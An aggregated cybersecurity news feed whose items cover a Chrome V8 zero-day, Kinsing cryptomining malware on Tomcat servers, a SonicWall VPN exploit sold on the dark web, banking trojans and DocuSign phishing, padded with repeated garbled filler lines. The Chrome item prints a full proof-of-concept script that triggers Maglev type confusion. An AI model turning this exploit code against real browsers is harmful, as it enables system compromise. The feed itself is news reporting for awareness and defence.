CYBERSECURITY / DEFENSE / INTELLIGENCE

  • With Russia pressing from the east and Trump polling well in the west, the EU needs a dramatic increase in its defense capabilities.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • A proof-of-concept (PoC) exploit for a critical zero-day vulnerability (CVE-2024-4947) in Google Chrome has been made public.

    The potential for exploitation of this vulnerability, which impacts the V8 JavaScript engine, has generated considerable apprehension among members of the cybersecurity community.

    Details of CVE-2024-4947

    The CVE-2024-4947 vulnerability arises from erroneous AccessInfo values assigned to module namespace objects within the V8 engine.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    This vulnerability may cause type confusion in the Just-In-Time (JIT) compiler Maglev, which V8 utilizes.

    Type confusion vulnerabilities manifest when an application declares a variable or object as one type but subsequently manipulates its type, as reported by GitHub. This can potentially result in security breaches and erratic behavior.

    Technical Breakdown

    The matter transpires when the V8 engine processes AccessInfo for module namespace objects in an erroneous manner, leading to a misinterpretation of the types of these objects by the Maglev JIT compiler.

    An assailant may exploit this misunderstanding to execute arbitrary code within the browser’s context, potentially resulting in a complete compromise of the system.

    // run with: `/d8 --allow-natives-syntax --maglev --expose-gc --soft-abort --trace-deopt 22.mjs`
    
    import * as ns from "./22.mjs";
    
    export let c = 0;
    
    function to_fast(o) {
    
      var dummy = {'unique':5};
    
      dummy.__proto__ = o;                                                                                                                                                                                                                
    
      dummy.__proto__ = o; //OptimizeAsFastPrototype
    
    }
    
    to_fast(ns);
    
    function store(target, v) {
    
      target.c = v;
    
    }
    
    function createObject() {
    
      let a = {};
    
      a.i1 = 1;
    
      a.i2 = 1;
    
      a.i3 = 1;
    
      a.i4 = 1;
    
      // -----------------
    
      for (let i = 0; i < 8; i++) {
    
        a[`p${i}`] = 1;
    
      }
    
      return a;
    
    }
    
    function init() {
    
      let a = createObject();
    
      a.__proto__ = ns;
    
      // %DebugPrint(a);
    
      return a;
    
    }
    
    (function() {
    
      %PrepareFunctionForOptimization(store);
    
      store(init(), 0);
    
      %OptimizeMaglevOnNextCall(store);
    
      store(init(), 0);
    
    })();
    
    function confuse_properties_map(arg) {
    
      store(arg, 0x1);
    
    }
    
    let a = init();
    
    let arr = [];
    
    arr.push(1.1);
    
    let arr2 = [{}];
    
    confuse_properties_map(a);
    
    gc();
    
    // %DebugPrint(a);
    
    // %DebugPrint(arr);
    
    a.p5 = 1024;
    
    a.p7 = 1024;
    
    %DebugPrint(arr);
    
    // %SystemBreak();


    The PoC exploit illustrates how a malevolent actor can exploit this susceptibility to execute arbitrary code.

    The methodology entails developing a malevolent webpage that, upon user interaction, activates the type confusion vulnerability in the V8 engine, thereby granting the assailant permission to execute illicit code on the target’s system.

    PoC exploit serves
    PoC exploit serves

    Recommendations and Implications

    Considering the pervasive utilization of Google Chrome, this susceptibility presents a substantial hazard to users across the globe.

    Users must immediately update their browsers to the most recent version whenever a security upgrade is available.

    Organizations should also consider implementing additional security measures, such as intrusion detection systems and web application firewalls, to reduce the risk of exploitation.

    A proof-of-concept exploit for CVE-2024-4947 has been made public, highlighting the persistent difficulties in securing contemporary web browsers.

    Maintaining a state of constant vigilance and proactivity in the face of security threats is critical for both developers and users, as malicious actors persist in discovering and capitalizing on weaknesses in widely utilized software.

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post PoC Exploit Published for 0-day Vulnerability in Google Chrome appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • A “multi-faceted campaign” has been observed abusing legitimate services like GitHub and FileZilla to deliver an array of stealer malware and banking trojans such as Atomic (aka AMOS), Vidar, Lumma (aka LummaC2), and Octo by impersonating credible software like 1Password, Bartender 5, and Pixelmator Pro. “The presence of multiple malware variants suggests a broad cross-platform targeting

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Kinsing malware, known for exploiting vulnerabilities on Linux cloud servers to deploy backdoors and cryptominers, has recently expanded its target to include Apache Tomcat servers. 

    The malware utilizes novel techniques to evade detection by hiding itself within seemingly innocuous system files, granting it persistence on the compromised system, highlighting the evolving tactics of Kinsing and emphasizing the need for system administrators to be vigilant against these emerging threats. 

    Kinsing exploits vulnerabilities in containers and servers to deploy backdoors and cryptominers, as findings show multiple compromised servers, including an Apache Tomcat with critical flaws. 

    Tomcat, a publicly accessible open-source server for static content, presents a prime target due to its internet exposure, which allows Kinsing to infiltrate the system and establish hidden backdoors for persistence while deploying cryptominers to steal computing resources for cryptocurrency mining. 

    Kinsing malware employs a novel persistence strategy, hiding within unsuspecting locations on compromised Linux systems. 

    It leverages three separate “man” page directories (/var/cache/man/cs/cat1/, /var/cache/man/cs/cat3/, /var/cache/man/zh_TW/cat8/) typically used for legitimate system documentation, which exploits the assumption that security personnel wouldn’t scrutinize these directories for malware, allowing Kinsing to remain undetected for extended periods. 

    The listed directories are suspicious as they cover locations for user-level commands (/var/cache/man/cs/cat1/), library functions (/var/cache/man/cs/cat3/), and system administration tasks (/var/cache/man/zh_TW/cat8/), suggesting potential manipulation. 

    Additionally, the presence of a directory associated with Kerberos authentication (/var/lib/gssproxy/rcache/) hints at attempts to bypass authentication or elevate privileges, as this directory structure is uncommon and could be a sign of malware installation.

    Β version of XMRig

    Attackers are hiding malware within legitimate system file directories on compromised Tomcat servers, like /var/cache/man/, commonly store harmless files, making the malware blend in and evade detection. 

    According to Tenable, this tactic extends the lifespan of the malware on the system, as the malware itself isn’t recent, having been discovered in China around late 2022, but the Tomcat server attacks using this technique began in mid-2023, as evidenced by the file creation dates.

    Malware

    A stealthy cryptojacking campaign has been leveraging outdated XMRig miners (v6.12.2) for nearly a year, while XMRig is a legitimate open-source CPU miner for Monero, a privacy-focused cryptocurrency. 

    The outdated version on compromised systems suggests a potential lack of maintenance by the attackers, indicating an opportunity for detection and mitigation, as the  Current XMRig version is 6.21.2, available on GitHub.  

    The post Kinsing Malware Attacking Apache Tomcat Servers To Deploy Cryptominers appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The dark web has seen the release of a new vulnerability that targets SonicWALL SSL-VPN devices.

    Recently, the exploit, which lets people enter private networks without permission, was sold on a well-known dark web market.

    The news was first shared by the well-known hacking news site Daily Dark Web on their official Twitter account.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    Cybercriminals could get around security measures and into private data and systems if the exploit is used.

    Experts are quickly trying to determine what this vulnerability means for SonicWALL, a well-known manufacturer of network security products.

    Because the exploit is on the dark web, there are big worries about how broad cyberattacks could be, especially against businesses and institutions that use SonicWALL’s SSL-VPN technology.

    Urgent Response from Cybersecurity Community

    Experts in hacking reacted quickly to the news, telling companies they needed to protect their networks immediately.

    Some suggestions are to use the most recent firmware, set up multi-factor authentication, and do full security audits to find and fix any possible weaknesses.

    Although SonicWALL hasn’t publicly commented on the exploit yet, the company will likely soon provide advice and patches to fix the problem.

    In the meantime, cybersecurity companies and independent experts are working hard to figure out how to stop the exploit and make it less likely to happen.

    This event shows that online threats are always changing and how important it is to maintain strong security measures.

    As things change, businesses are told to stay alert and take action to protect their digital assets.

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Sonicwall SSL-VPN exploit Advertised on the Dark web appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that delivers Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware. “These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Washington should foster coalitions that can offer a better value proposition than competing revisionist powers.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The U.S. Department of Justice (DoJ) has charged two arrested Chinese nationals for allegedly orchestrating a pig butchering scam that laundered at least $73 million from victims through shell companies. The individuals, Daren Li, 41, and Yicheng Zhang, 38, were arrested in Atlanta and Los Angeles on April 12 and May 16, respectively. The foreign nationals have been “charged for leading a scheme

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • The threat actors behind the Windows-based Grandoreiro banking trojan have returned in a global campaign since March 2024 following a law enforcement takedown in January. The large-scale phishing attacks, likely facilitated by other cybercriminals via a malware-as-a-service (MaaS) model, target over 1,500 banks across the world, spanning more than 60 countries in Central and South

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

  • Hackers prefer phishing as it exploits human vulnerabilities rather than technical flaws which make it a highly effective and low-cost attack method. 

    Phishing attacks can be easily scaled to target a large number of individuals, increasing the likelihood of success.

    Recently, cybersecurity analysts at Abnormal Security discovered that hackers are actively exploiting DocuSign with customizable phishing templates to steal credentials.

    Hackers Exploiting Docusign

    DocuSign phishing emails targeting customers have spiked, and this mirrors templates found on Russian cybercrime forums.Β 

    These carefully designed fraudulent emails pretend to be legitimate document signing requests from DocuSign but they take advantage of the fact that DocuSign is widely used and trusted. 

    Docusign phishing email (Source – Abnormal Security)

    Dark web anonymity enables threat actors to trade and tailor DocuSign templates for large-scale phishing, identity theft, and financial fraud. 

    Investigations show that there are many marketplaces where these templates are sold while others offer customization services with a promise of exclusivity.

    ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

    The growing number of such templates is indicative of digital fraud techniques that organizations need to be aware of in order to manage them.

    For instance, before launching phishing campaigns, threat actors either buy templates from reputable sellers on crime forums or get them directly from the targeted service like DocuSign.

    Buying templates is easy but requires good replication besides ensuring that they are exclusive. 

    Directly downloading templates can be time-consuming and risky as it may involve manual replication and reveal the identity of a criminal. Many people do not have the technical skills to create realistic-looking templates. 

    Phishing products (Source – Abnormal Security)

    Running several concurrent campaigns targeting various vendors means one does not have to spend much time creating the resource-intensive templates for every campaign, so, purchasing readymade ones saves time. 

    Cybercrime groups tend to streamline their operations in order to maximize their profits by sourcing out large quantities of pre-made templates or outsourcing their creation from third parties.

    Some threat actors make money by stealing DocuSign passwords through phishing and then use them to carry out BEC and corporate espionage.Β 

    For example, they can go over the files and find payment information, hack into a company’s account, and request money from partners pretending to be the company. 

    Also, they likewise vend critical files such as strategic plans of merging, financials, and lists of customers to outsiders or enter blackmail by using it as bait.Β 

    With this work, these individuals generate huge illegal gains while victim organizations experience economic losses and loss of public image.

    Recommendations

    Here below we have mentioned all the recommendations:-

    • Check the sender’s email address
    • Watch out for impersonal greetings
    • Verify the security code format
    • Inspect links before clicking
    • Use Docusign’s secure document access

    Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

    The post Hackers Exploiting Docusign With Phishing Attack To Steal Credentials appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.

    Go to source

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ

    ΒΆΒΆΒΆΒΆΒΆ